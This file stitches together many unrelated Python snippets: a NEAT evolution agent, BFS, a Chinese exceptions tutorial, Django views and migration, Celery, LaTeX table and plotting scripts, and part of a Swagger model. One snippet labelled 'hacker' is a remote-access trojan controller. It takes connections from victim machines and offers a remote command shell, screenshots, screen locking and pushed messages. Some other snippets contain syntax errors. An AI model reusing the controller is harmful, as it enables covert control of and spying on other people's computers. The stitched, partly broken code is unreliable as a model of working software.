def __init__(self, config, neat_config, state_normalizer):
self.config = config
self.neat_config = neat_config
self.state_normalizer = state_normalizer
self.env = config.env_fn()
self.repetitions = config.repetitions
def eval_genome(self, genome):
net = neat.nn.FeedForwardNetwork.create(genome, self.neat_config)
fitness = np.zeros(self.repetitions)
steps = np.zeros(fitness.shape)
for run in range(self.repetitions):
fitness[run], steps[run] = self.evaluate(net)
return np.mean(fitness), np.sum(steps)
def evaluate(self, net):
state = self.state_normalizer(self.env.reset())
steps = 0
rewards = 0
while True:
action = net.activate(state)
action = self.config.action_clip(action)
state, reward, done, _ = self.env.step(action)
state = self.state_normalizer(state)
rewards += reward
steps += 1
if done:
break
return self.config.reward_to_fitness(rewards), steps
class Worker(mp.Process):
def __init__(self, id, state_normalizer, task_q, result_q, stop, config, neat_config):
mp.Process.__init__(self)
self.id = id
self.task_q = task_q
self.result_q = result_q
self.state_normalizer = state_normalizer
self.stop = stop
self.config = config
self.env = config.env_fn()
self.evaluator = GenomeEvaluator(config, neat_config, state_normalizer)
def run(self):
np.random.seed()
while not self.stop.value:
if self.task_q.empty():
continue
id, genome = self.task_q.get()
fitness, steps = self.evaluator.eval_genome(genome)
self.result_q.put([id, fitness, steps])
class NEATAgent:
def __init__(self, config):
self.config = config
self.neat_config = self.load_neat_config()
self.neat_config.pop_size = config.pop_size
self.task_q = mp.SimpleQueue()
self.result_q = mp.SimpleQueue()
self.total_steps = 0
stop = mp.Value('i', False)
stats = SharedStats(config.state_dim)
normalizers = [StaticNormalizer(config.state_dim) for _ in range(config.num_workers)]
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
workers = [Worker(id, normalizers[id], self.task_q, self.result_q, stop,
config, self.neat_config) for id in range(config.num_workers)]
for w in workers: w.start()
self.normalizers = normalizers
self.stats = stats
self.stop = stop
def load_neat_config(self):
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'neat-config/%s.txt' % self.config.task)
neat_config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_path)
neat_config.fitness_threshold = self.config.target
return neat_config
def evaluate(self, genomes, _):
tasks = [genome for _, genome in genomes]
for id, task in enumerate(tasks):
self.task_q.put([id, task])
steps = 0
results = []
while len(results) < len(tasks):
if self.result_q.empty():
continue
id, fitness, step = self.result_q.get()
steps += step
tasks[id].fitness = fitness
results.append([id, fitness])
for normalizer in self.normalizers:
self.stats.merge(normalizer.online_stats)
normalizer.online_stats.zero()
for normalizer in self.normalizers:
normalizer.offline_stats.load(self.stats)
self.total_steps += steps
def test(self, genome):
normalizer = StaticNormalizer(self.config.state_dim)
normalizer.offline_stats.load(self.stats)
evaluator = GenomeEvaluator(self.config, self.neat_config, normalizer)
evaluator.repetitions = self.config.test_repetitions
return evaluator.eval_genome(genome)
def evolve(self):
class CustomReporter(BaseReporter):
def __init__(self, agent):
self.fitness = []
self.steps = []
self.timestamps = []
self.agent = agent
self.initial_time = time.time()
def post_evaluate(self, config, population, species, best_genome):
elapsed_time = time.time() - self.initial_time
self.steps.append(self.agent.total_steps)
self.timestamps.append(elapsed_time)
reward, _ = self.agent.test(best_genome)
self.fitness.append(reward)
# self.fitness.append(best_genome.fitness)
logger.info('total steps %d, test %f, best %f, elapsed time %f' %
(self.agent.total_steps, reward, best_genome.fitness, elapsed_time))
# if best_genome.fitness > self.agent.config.target:
# self.agent.stop.value = True
if self.agent.config.max_steps and self.agent.total_steps > self.agent.config.max_steps:
self.agent.stop.value = True
self.stats = [self.fitness, self.steps, self.timestamps]
best_genome.fitness = self.agent.config.target + 1
pop = neat.Population(self.neat_config)
# stats = neat.StatisticsReporter()
# pop.add_reporter(stats)
# pop.add_reporter(neat.StdOutReporter(True))
reporter = CustomReporter(self)
pop.add_reporter(reporter)
pop.run(self.evaluate)
return reporter.stats
def run(self):
return self.evolve()
def multi_runs(config):
fh = logging.FileHandler('log/NEAT-%s.txt' % config.task)
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
stats = []
runs = 10
for run in range(runs):
logger.info('Run %d' % (run))
stats.append(NEATAgent(config).run())
with open('data/NEAT-stats-%s.bin' % (config.task), 'wb') as f:
pickle.dump(stats, f)
def all_tasks():
configs = []
config = PendulumConfig()
config.action_clip = lambda a: [2 * a[0]]
config.max_steps = int(4e7)
configs.append(config)
config = BipedalWalkerConfig()
config.max_steps = int(2e8)
configs.append(config)
config = ContinuousLunarLanderConfig()
config.max_steps = int(4e7)
configs.append(config)
ps = []
for cf in configs:
# cf.max_steps = int(1e10)
cf.num_workers = 8
cf.pop_size = 64
ps.append(mp.Process(target=multi_runs, args=(cf, )))
for p in ps: p.start()
for p in ps: p.join()
if __name__ == '__main__':
all_tasks()
|
import socket, os, time, threading, sys
from queue import Queue
# Хакер
intThreads = 2
arrJobs = [1,2]
queue = Queue()
arrAddresses = []
arrConnections = []
strHost = '192.168.1.150' #ip хакера
intPort = 4444
intBuff = 1024
decode_utf = lambda data: data.decode("utf-8")
remove_quotes = lambda string: string.replace("\"","")
center = lambda string, title: f"{{:^{len(string)}}}".format(title)
send = lambda data: conn.send(data)
recv = lambda buffer: conn.recv(buffer)
def recvall(buffer):
byData = b""
while True:
bytPart = recv(buffer)
if len(bytPart) == buffer:
return bytPart
byData += bytPart
if len(byData) == buffer:
return byData
def create_socket():
global objSocket
try:
objSocket = socket.socket()
objSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except socket.error() as strError:
print("Error creating socket" + str(strError))
def socket_bind():
global objSocket
try:
print("Listening on port:" + str(intPort))
objSocket.bind((strHost,intPort))
objSocket.listen(20)
except socket.error() as strError:
print("Error binding socket" +str(strError))
socket_bind()
def socket_accept():
while True:
try:
conn, address = objSocket.accept()
conn.setblocking(1)
arrConnections.append(conn)
client_info = decode_utf(conn.recv(intBuff)).split("',")
address += client_info[0], client_info[1], client_info[2]
arrAddresses.append(address)
print("\n"+ "Connection has been established : {0} ({1})".format(address[0],address[2]))
except socket.error:
print("Error acceptting connections")
continue
def menu_help():
print("\n"+"--help")
print("--l system (система)")
print("--x exit (выход)")
print("--m [text] (сообщение на экран")
print("--i 0")
print("--p (скрин экрана")
print("--x 1 (заблокировать экран)")
print("--e")
def main_menu():
while True:
strChoice =input("\n"+"~#")
if strChoice == "--l":
list_connections()
elif strChoice[:3] == "--i" and len(strChoice) > 3:
conn = select_connection(strChoice[4:], "True")
if conn is not None:
send_command()
elif strChoice == "--p":
screenshot()
elif strChoice =="--x":
close()
break
else:
print('invalid choice')
menu_help()
def close():
global arrConnections, arrAddresses
if len(arrAddresses) ==0:
return
for intCounter, conn in enumerate(arrConnections):
conn.send(str.encode("exit"))
conn.close()
del arrConnections; arrConnections = []
del arrAddresses; arrAddresses = []
def list_connections():
if len(arrConnections) > 0:
strClients = ""
for intCounter, conn in enumerate(arrConnections):
strClients += str(intCounter) + 4*" " + str(arrAddresses[intCounter][0]) + 4*" " + \
str(arrAddresses[intCounter][1]) + 4*" "+ str(arrAddresses[intCounter][2])+ 4*" "+ \
str(arrAddresses[intCounter][3]) + "\n"
print("\n"+ "ID"+ 3*" "+center(str(arrAddresses[0][0])), "IP" ) + 4*" "+
center(str(arrAddresses[0][1]), "Port") + 4*" "+
center(str(arrAddresses[0][2]), "PC Name") + 4*" " +
center(str(arrAddresses[0][3]), "OS") + "\n" +strClients, end= ""
else:
print("No connections(нет соединения)")
def select_connection(connection_id, blnGetResponse):
global conn, arrInfo
try:
connection_id = int(connection_id)
conn = arrConnections[connection_id]
except:
print("invalid choice")
return
else:
arrInfo = str(arrAddresses[connection_id][0]),str(arrAddresses[connection_id][2]), \
str(arrAddresses[connection_id][3]), \
str(arrAddresses[connection_id][4])
if blnGetResponse == "True":
print("You are connected to" + arrInfo[0] + "......." + "\n")
return conn
def send_commands():
while True:
strChoice = input("\n" + "Type Selection")
if strChoice[:3] == "--m" and len(strChoice) > 3:
strMsg = "msg" + strChoice[4:]
send(str.encode(strMsg))
elif strChoice[:3] == "--o" and len(strChoice) > 3:
strSite = "site" + strChoice[4:]
send(str.encode(strSite))
elif strChoice == "--p":
screenshot()
elif strChoice == "--x 1":
send(str.encode("lock"))
elif strChoice == "--e":
command_shell()
def command_shell():
send(str.encode("cmd"))
strDefault = "\n"+ decode_utf(recv(intBuff)) + ">"
print(strDefault, end= "")
while True:
strCommand = input()
if strCommand == "quit" or strCommand == "exit":
send(str.encode("goback"))
elif strCommand == "cmd":
print("Please do not use this command..")
elif len(str(strCommand)) > 0:
send(str.encode(strCommand))
intBuff = int(decode_utf(recv(intBuff)))
strClientResponse = decode_utf(recvall(intBuffer))
print(strClientResponse, end="")
else:
print(strDefault, end="")
def screenshot():
send(str.encode("screen"))
strClientResponse = decode_utf(recv(intBuff))
print("\n" + strClientResponse)
intBuffer = ''
for intCounter in range(0,len(strClientResponse)):
if strClientResponse[intCounter].isdigit():
intBuffer += strClientResponse[intCounter]
intBuffer = int(intBuffer)
strFile = time.strftime("%Y%m%d%H%M%S" + ".png")
ScrnData = recvall(intBuffer)
objPic = open(strFile, "wb")
objPic.write(ScrnData); objPic.close()
print("Done" + "\n" + "Total bytes recevied:" + os.path.getsize(strFile)) + "bytes"
def create_threads():
for _ in range(intThreads):
objThread =threading.Thread(target=work)
objThread.daemon = True
objThread.start()
queue.join()
def work():
while True:
intValue = queue.get()
if intValue == 1:
create_socket()
socket_bind()
socket_accept()
elif intValue == 2:
while True:
time.sleep(0.2)
if len(arrAddresses) > 0:
break
queue.task_done()
queue.task_done()
sys.exit(0)
def create_jobs():
for intThreads in arrJobs:
queue.put(intThreads)
queue.join()
create_threads()
create_jobs()
|
# O(v+e) time | o(v) space
class Node:
def __init__(self, name):
self.children = []
self.name = name
self.visited = set()
def addChild(self, name):
self.children.append(Node(name))
return self
def breadthFirstSearch(self, array):
queue = [self]
while len(queue):
item = queue.pop(0)
if item not in self.visited:
self.visited.add(item)
array.append(item.name)
for childItem in item.children:
if childItem not in self.visited:
queue.append(childItem)
return array
"""
Recursive
"""
|
#程序异常
#常见的异常
"""
NameError :尝试访问一个没有声明的变量引发的错误
IndexError :索引超出序列范围引发的错误
IndentationError :缩进错误
ValueError :传入的值错误
KeyError :请求一个不存在的字典关键字引发错误
IOError :输入输出错误(如果读取文件不存在)
ImportError :当import语句无法找到模块或from无法在模块中找到相应的名称是引发的错误
AttributeError :尝试访问未知的对象属性引发的错误
TypeError :类型不合适引发的错误
MemoryError :内存不足
ZeroDivisionError :除数为0引发的错误
"""
#异常处理语句
"""
try......except捕获异常
如果在except后面不指定异常名称,则表示捕获全部异常
使用try......except语句捕获异常后,当程序出错时,输出错误信息后,程序会继续执行
try.....except...else语句
用于指定当try语句块中没有发生异常时要执行的else语句块,当try语句中的块发生异常时将不会执行else中的语句
try....except....finally语句
完整的异常处理语句,无论程序中有无异常产生,finally代码块中的代码都会被执行
"""
# def division():
# "测试:分苹果"
# print("\n============分苹果了===========\n")
# apple = int(input("请输入苹果的个数:"))
# children = int(input("请输入来了几个小朋友:"))
# result = apple // children
# remain = apple - result * children #剩余的苹果
# if remain > 0:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个,剩下", remain, "个。")
# else:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个。")
# if __name__ == "__main__":
# try:
# division()
# except ZeroDivisionError:
# print("\n出错了 ~-~ --苹果不能被0个小朋友分!")
# except ValueError as e:
# print("输入错误:", e)
# else:
# print("分苹果顺利完成......")
# finally:
# print("进行了一次分苹果操作")
"""
raise语句抛出异常
如果某个函数或者方法可能会产生异常,但是不想在当前函数或方法中处理异常,则可以使用raise语句抛出异常
语法:
raise[exceptionName(reason)]
exceptionName : 为可选参数,用于指定抛出的异常名称
reason :对异常的相关描述
"""
# def division():
# "测试:分苹果"
# print("\n============分苹果了===========\n")
# apple = int(input("请输入苹果的个数:"))
# children = int(input("请输入来了几个小朋友:"))
# if apple < children:
# raise ValueError("苹果太少,不够分啊........") #使用raise抛出异常
# result = apple // children
# remain = apple - result * children #剩余的苹果
# if remain > 0:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个,剩下", remain, "个。")
# else:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个。")
# if __name__ == "__main__":
# try:
# division()
# except ZeroDivisionError:
# print("\n出错了 ~-~ --苹果不能被0个小朋友分!")
# except ValueError as e:
# print("输入错误:", e)
# else:
# print("分苹果顺利完成......")
# finally:
# print("进行了一次分苹果操作")
#使用assert语句调试程序 |
# tuples
# paranthesis are not required.. but preferred
zoo = ('python','elephant','penguin')
print 'Number of animals in the zoo : ',len(zoo)
new_zoo = 'monkey', 'camel', zoo
print 'Number of animals in new zoo : ',len(new_zoo)
print 'Animals in zoo: ', zoo
print 'Animals in new zoo: ', new_zoo
# zoo
print new_zoo[2]
print new_zoo[2][2]
|
from celery import Celery
from time import sleep
app = Celery('tasks',broker='pyamqp://guest@localhost//', backend='amqp')
@app.task
def reverse(text):
sleep(5)
return text[::-1]
|
import pandas as pd
import re,sys
def format_data (x):
if isinstance(x,int):
return str(x)
if isinstance(x,float):
return str(round(x,4))
if isinstance(x,str):
return re.sub("_","\\_",x)
raise RuntimeException("Unsupported Type to be formatted")
def print_table(dfinput,idcolumnIndex, longtable, landscape,selected_columns=None,legend=True):
"""
everything would repeat if before endhead tag
"""
df = dfinput if selected_columns is None else dfinput[selected_columns]
section = "longtable" if longtable else "tabular"
colsize = len(df.columns)
nrows = df.shape[0]
start = "\\begin{landscape}" if landscape else ""
if not longtable:
start += "\\resizebox{\\columnwidth}{!}{"
start += "\\def\\sym#1{\\ifmmode^{#1}\\else\\(^{#1}\\)\\fi} \\begin{" + section + "}{l*{"+str(colsize)+"}{c}} "
start += "\\hline\\hline "
for i,col in enumerate(df.columns):
if i>idcolumnIndex:
start += " & \\multicolumn{1}{c}{("+str(i)+")}"
else:
start += " & \\multicolumn{1}{c}{}"
start += " \\\\"
for i,col in enumerate(df.columns):
if i>idcolumnIndex:
start += " & \\multicolumn{1}{c}{"+str(col)+"}"
else:
start += " & \\multicolumn{1}{c}{}"
start += "\\\\ \\hline"
dat = df.to_dict()
for i in range(nrows):
start += "\\\\"
row = [dat[col][i] for col in df.columns]
for c in row:
start += " & " + format_data(c)
end = ""
if legend:
end += "\\\\ \\hline\\hline \\multicolumn{2}{l}{\\footnotesize \\textit{p}-values in parentheses}"
end += "\\\\ \\multicolumn{2}{l}{\\footnotesize \sym{*} \\(p<0.05\\), \\sym{**} \\(p<0.01\\), \\sym{***} \\(p<0.001\\)}"
end += "\\\\ \\end{" + section + "}"
if not longtable:
end += "}"
if landscape:
end += "\\end{landscape}"
return start + end
def has_invalidchars(colname):
if set(colname).intersection(set(['.','_'])):
raise ValueError("Invalid character in %s" % colname)
if __name__ == "__main__":
#df = pd.DataFrame( {'A':[1,2],'B':["GBP","USD"]})
#selected_columns = ['idname','qfruitsveg', 'qVfruitsveg', 'qVprotein', 'qnonfresh',
# 'qcomplements', 'qVcomplements', 'qdensefoods', 'qVdensefoods',
# 'qtransport', 'qVnonfresh', 'qhousehold', 'qenergy', 'qprotein']
#selected_columns = ["idname","qbeef","qbeer","qbread","qbunscakes","qcassavaflour","qcassavafresh","qcharcoal","qcoconut","qcookingoil","qdriedcannedfish","qelectricity","qfishseafood","qfreshmilk","qgreens","qkerosene","qmangoes","qonion","qpeanuts","qpotatoes","qpulses","qricehusked","qsalt","qsugar","qsweetpotato"]
df = pd.read_csv(sys.argv[1],keep_default_na=False)
if any (has_invalidchars(colname) for colname in df.columns):
raise ValueError("Invalid chars")
selected_columns = df.columns
#print(df)
#print(print_table(dfinput=df,idcolumnIndex=0,longtable=False,landscape=False,selected_columns=selected_columns))
print(print_table(dfinput=df,idcolumnIndex=0,longtable=False,landscape=False,selected_columns=selected_columns))
|
import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
class ActivityBenchmark(benchmark.Benchmark):
def __init__(self):
super().__init__('activity',
(('--sequence_length', 64, int),
('--max_samples', 40_000, int),
('--sample_distance', 4, int),
('--loss_name', 'SparseCategoricalCrossentropy', str),
('--loss_config', {'from_logits': True}, dict),
('--metric_name', 'SparseCategoricalAccuracy', str)))
def get_data_and_output_size(self):
sequence_length = self.args.sequence_length
max_samples = self.args.max_samples
sample_distance = self.args.sample_distance
activity_table = pd.read_csv(os.path.join(self.supplementary_data_dir, 'activity.csv'), header=None)
sensor_inputs = []
time_inputs = []
activity_outputs = []
for activity_marker in activity_table[0].unique():
activity_series = activity_table[activity_table[0] == activity_marker].iloc[:, 1:]
for start_index in range(0, len(activity_series) - sequence_length + 1, sample_distance):
current_sequence = np.array(activity_series[start_index:start_index + sequence_length])
sensor_inputs.append(current_sequence[:, 1:8])
time_inputs.append(current_sequence[:, :1])
activity_outputs.append(current_sequence[-1, 8:])
return (np.stack(sensor_inputs)[:max_samples], np.stack(time_inputs)[:max_samples]), (np.stack(activity_outputs)[:max_samples],), 7
ActivityBenchmark()
|
# coding: utf-8
# In[1]:
import matplotlib.pyplot as plt
# In[15]:
year = [1950, 1951, 1952,]
pop = [2.538, 2.57, 2.62]
# In[16]:
plt.plot(year, pop)
plt.xlabel('Year')
plt.ylabel('Population')
plt.title('World Population Projections')
plt.yticks([0, 2, 4, 6, 8, 10],
['0', '2B', '4B', '6B', '8B', '10B']) # must be same length as first list
# Add more data
year = [1800, 1850, 1900] + year
pop = [1.0, 1.262, 1.650] + pop
plt.show()
# In[ ]:
|
from django.db.models import Q
from rest_framework.filters import (
SearchFilter,
OrderingFilter,
)
from rest_framework.generics import (
ListAPIView,
CreateAPIView,
RetrieveAPIView,
)
from rest_framework.mixins import (
DestroyModelMixin,
UpdateModelMixin,
)
from rest_framework.permissions import AllowAny
from posts.api.permissions import IsOwnerOrReadOnly
from posts.api.pagination import PostPageNumberPagination
from ..models import Comment
from .serializers import (
CommentListSerializer,
CommentDetailSerializer,
create_comment_serializer,
)
class CommentCreateAPIView(CreateAPIView):
queryset = Comment.objects.all()
# permission_classes = [IsAuthenticated]
def get_serializer_class(self):
model_type = self.request.GET.get("type")
slug = self.request.GET.get("slug")
parent_id = self.request.GET.get("parent_id")
return create_comment_serializer(model_type, slug, parent_id, user=self.request.user)
class CommentDetailAPIView(DestroyModelMixin, UpdateModelMixin, RetrieveAPIView):
queryset = Comment.objects.filter(id__gte=0)
serializer_class = CommentDetailSerializer
permission_classes = [IsOwnerOrReadOnly]
def put(self, *args, **kwargs):
return update(self, *args, **kwargs)
def delete(self, *args, **kwargs):
return destroy(self, *args, **kwargs)
class CommentListAPIView(ListAPIView):
serializer_class = CommentListSerializer
filter_backends = [SearchFilter, OrderingFilter]
search_fields = ['content', 'user__first_name']
pagination_class = PostPageNumberPagination # PageNumberPagination
# permission_classes = [AllowAny]
def get_queryset(self, *args, **kwargs):
queryset_list = Comment.objects.filter(id__gte=0)
query = self.request.GET.get("q")
if query:
queryset_list = queryset_list.filter(
Q(content__icontains=query) |
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
return queryset_list
|
N = int(input())
output = ''
for i in range(N):
output += '*'
print(output)
for i in range(N-1):
output = output[:-1:]
print(output~)
|
from random import choice
lot = [1, 2, 3, 4, 5, 6, 7, 8, 9, 15, "a","z","b","y", "c"]
winner = []
while len(winner) < 4:
numero_w = choice(lot)
if numero_w not in winner:
print(f"We pulled: {numero_w}")
winner.append(numero_w)
print(f"The winner is {winner}") |
import sys
sys.path.append('..')
from bhbot.models import Command
class AliveCommand(Command):
@property
def triggers(self):
return ['alive']
def __call__(self, context: dict) -> str:
return 'Yes, I am alive.'
def get_command():
return AliveCommand
|
# Generated by Django 3.0.5 on 2020-04-03 08:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('fvh_courier', '0025_auto_20200402_1257'),
]
operations = [
migrations.AlterField(
model_name='packagesms',
name='message_type',
field=models.PositiveSmallIntegerField(choices=[(0, 'courier_notification'), (1, 'reservation'), (2, 'pickup'), (3, 'delivery')]),
),
migrations.CreateModel(
name='PrimaryCourier',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('courier', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='is_primary_courier_for', to=settings.AUTH_USER_MODEL)),
('sender', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='primary_courier', to=settings.AUTH_USER_MODEL)),
],
),
]
|
# coding: utf-8
"""
Cyclos 4.11.5 API
The REST API for Cyclos 4.11.5 # noqa: E501
OpenAPI spec version: 4.11.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.configuration import Configuration
class BaseTransQueryFilters(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'date_period': 'list[datetime]',
'transfer_filters': 'list[str]',
'transfer_types': 'list[str]',
'transaction_number': 'str',
'user': 'str',
'groups': 'list[str]',
'by': 'str',
'broker': 'str',
'channels': 'list[str]',
'excluded_ids': 'list[str]',
'access_clients': 'list[str]',
'include_generated_by_access_client': 'bool',
'from_current_access_client': 'bool',
'amount_range': 'list[BigDecimal]'
}
attribute_map = {
'date_period': 'datePeriod',
'transfer_filters': 'transferFilters',
'transfer_types': 'transferTypes',
'transaction_number': 'transactionNumber',
'user': 'user',
'groups': 'groups',
'by': 'by',
'broker': 'broker',
'channels': 'channels',
'excluded_ids': 'excludedIds',
'access_clients': 'accessClients',
'include_generated_by_access_client': 'includeGeneratedByAccessClient',
'from_current_access_client': 'fromCurrentAccessClient',
'amount_range': 'amountRange'
}
def __init__(self, date_period=None, transfer_filters=None, transfer_types=None, transaction_number=None, user=None, groups=None, by=None, broker=None, channels=None, excluded_ids=None, access_clients=None, include_generated_by_access_client=None, from_current_access_client=None, amount_range=None, _configuration=None): # noqa: E501
"""BaseTransQueryFilters - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._date_period = None
self._transfer_filters = None
self._transfer_types = None
self._transaction_number = None
self._user = None
self._groups = None
self._by = None
self._broker = None
self._channels = None
self._excluded_ids = None
self._access_clients = None
self._include_generated_by_access_client = None
self._from_current_access_client = None
self._amount_range = None
self.discriminator = None
if date_period is not None:
self.date_period = date_period
if transfer_filters is not None:
self.transfer_filters = transfer_filters
if transfer_types is not None:
self.transfer_types = transfer_types
if transaction_number is not None:
self.transaction_number = transaction_number
if user is not None:
self.user = user
if groups is not None:
self.groups = groups
if by is not None:
self.by = by
if broker is not None:
self.broker = broker
if channels is not None:
self.channels = channels
if excluded_ids is not None:
self.excluded_ids = excluded_ids
if access_clients is not None:
self.access_clients = access_clients
if include_generated_by_access_client is not None:
self.include_generated_by_access_client = include_generated_by_access_client
if from_current_access_client is not None:
self.from_current_access_client = from_current_access_client
if amount_range is not None:
self.amount_range = amount_range
@property
def date_period(self):
"""Gets the date_period of this BaseTransQueryFilters. # noqa: E501
The minimum / maximum transfer date. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:return: The date_period of this BaseTransQueryFilters. # noqa: E501
:rtype: list[datetime]
"""
return self._date_period
@date_period.setter
def date_period(self, date_period):
"""Sets the date_period of this BaseTransQueryFilters.
The minimum / maximum transfer date. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:param date_period: The date_period of this BaseTransQueryFilters. # noqa: E501
:type: list[datetime]
"""
self._date_period = date_period
@property
def transfer_filters(self):
"""Gets the transfer_filters of this BaseTransQueryFilters. # noqa: E501
Reference to the transfer filters, which filters transfers by type. May be either the internal id or qualified transfer filter internal name, in the format `accountType.transferFilter`. # noqa: E501
:return: The transfer_filters of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._transfer_filters
@transfer_filters.setter
def transfer_filters(self, transfer_filters):
"""Sets the transfer_filters of this BaseTransQueryFilters.
Reference to the transfer filters, which filters transfers by type. May be either the internal id or qualified transfer filter internal name, in the format `accountType.transferFilter`. # noqa: E501
:param transfer_filters: The transfer_filters of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._transfer_filters = transfer_filters
@property
def transfer_types(self):
"""Gets the transfer_types of this BaseTransQueryFilters. # noqa: E501
Reference to the transfer types for filter. May be either the internal id or qualified transfer type internal name, in the format `accountType.transferType`. # noqa: E501
:return: The transfer_types of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._transfer_types
@transfer_types.setter
def transfer_types(self, transfer_types):
"""Sets the transfer_types of this BaseTransQueryFilters.
Reference to the transfer types for filter. May be either the internal id or qualified transfer type internal name, in the format `accountType.transferType`. # noqa: E501
:param transfer_types: The transfer_types of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._transfer_types = transfer_types
@property
def transaction_number(self):
"""Gets the transaction_number of this BaseTransQueryFilters. # noqa: E501
The transaction number of the matching transfer # noqa: E501
:return: The transaction_number of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._transaction_number
@transaction_number.setter
def transaction_number(self, transaction_number):
"""Sets the transaction_number of this BaseTransQueryFilters.
The transaction number of the matching transfer # noqa: E501
:param transaction_number: The transaction_number of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._transaction_number = transaction_number
@property
def user(self):
"""Gets the user of this BaseTransQueryFilters. # noqa: E501
Reference a user that should have either received / performed the transfer. # noqa: E501
:return: The user of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._user
@user.setter
def user(self, user):
"""Sets the user of this BaseTransQueryFilters.
Reference a user that should have either received / performed the transfer. # noqa: E501
:param user: The user of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._user = user
@property
def groups(self):
"""Gets the groups of this BaseTransQueryFilters. # noqa: E501
Reference to the user group used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:return: The groups of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._groups
@groups.setter
def groups(self, groups):
"""Sets the groups of this BaseTransQueryFilters.
Reference to the user group used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:param groups: The groups of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._groups = groups
@property
def by(self):
"""Gets the by of this BaseTransQueryFilters. # noqa: E501
Reference to the user that was authenticated when the transfer was performed. Is only taken into account if authenticated as administrator. # noqa: E501
:return: The by of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._by
@by.setter
def by(self, by):
"""Sets the by of this BaseTransQueryFilters.
Reference to the user that was authenticated when the transfer was performed. Is only taken into account if authenticated as administrator. # noqa: E501
:param by: The by of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._by = by
@property
def broker(self):
"""Gets the broker of this BaseTransQueryFilters. # noqa: E501
Reference to the broker of users involved in transfers. Is only taken into account if authenticated as administrator. # noqa: E501
:return: The broker of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._broker
@broker.setter
def broker(self, broker):
"""Sets the broker of this BaseTransQueryFilters.
Reference to the broker of users involved in transfers. Is only taken into account if authenticated as administrator. # noqa: E501
:param broker: The broker of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._broker = broker
@property
def channels(self):
"""Gets the channels of this BaseTransQueryFilters. # noqa: E501
Reference to the channel used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:return: The channels of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._channels
@channels.setter
def channels(self, channels):
"""Sets the channels of this BaseTransQueryFilters.
Reference to the channel used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:param channels: The channels of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._channels = channels
@property
def excluded_ids(self):
"""Gets the excluded_ids of this BaseTransQueryFilters. # noqa: E501
List of transfers ids to be excluded from the result. # noqa: E501
:return: The excluded_ids of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._excluded_ids
@excluded_ids.setter
def excluded_ids(self, excluded_ids):
"""Sets the excluded_ids of this BaseTransQueryFilters.
List of transfers ids to be excluded from the result. # noqa: E501
:param excluded_ids: The excluded_ids of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._excluded_ids = excluded_ids
@property
def access_clients(self):
"""Gets the access_clients of this BaseTransQueryFilters. # noqa: E501
References to access clients (id or token) used to perform / receive the transfer. # noqa: E501
:return: The access_clients of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._access_clients
@access_clients.setter
def access_clients(self, access_clients):
"""Sets the access_clients of this BaseTransQueryFilters.
References to access clients (id or token) used to perform / receive the transfer. # noqa: E501
:param access_clients: The access_clients of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._access_clients = access_clients
@property
def include_generated_by_access_client(self):
"""Gets the include_generated_by_access_client of this BaseTransQueryFilters. # noqa: E501
Flag indicating whether to include or not the generated transfer. Only valid if there is at least one access client specified. For example if a `ticket` or `paymentRequest` was processed then a new transfer will be generated. # noqa: E501
:return: The include_generated_by_access_client of this BaseTransQueryFilters. # noqa: E501
:rtype: bool
"""
return self._include_generated_by_access_client
@include_generated_by_access_client.setter
def include_generated_by_access_client(self, include_generated_by_access_client):
